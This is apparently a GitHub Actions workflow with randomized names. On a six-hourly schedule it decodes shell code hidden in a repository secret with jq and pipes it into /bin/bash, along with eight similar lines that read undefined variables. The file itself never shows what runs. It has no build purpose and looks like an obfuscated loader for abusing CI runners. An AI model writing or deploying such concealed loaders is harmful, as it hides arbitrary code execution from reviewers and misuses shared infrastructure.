name: mengyinying8716

on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mengyinying8716
        env:
          zxz3114: ${{ secrets.zxz3114 }}
        run: |
          echo $zxz3114 | jq -r .hshdn8980 | /bin/bash
          echo $opr906 | jq -r .t32592 | /bin/bash
          echo $kfg8531 | jq -r .mir032 | /bin/bash
          echo $knxwj25 | jq -r .ppcb170 | /bin/bash
          echo $dgyie3111 | jq -r .uawu0104 | /bin/bash
          echo $ijfpm624 | jq -r .c55815 | /bin/bash
          echo $hyyno655 | jq -r .td573 | /bin/bash
          echo $unpm7574 | jq -r .ljotl6 | /bin/bash
          echo $awj79861 | jq -r .ifk16 | /bin/bash

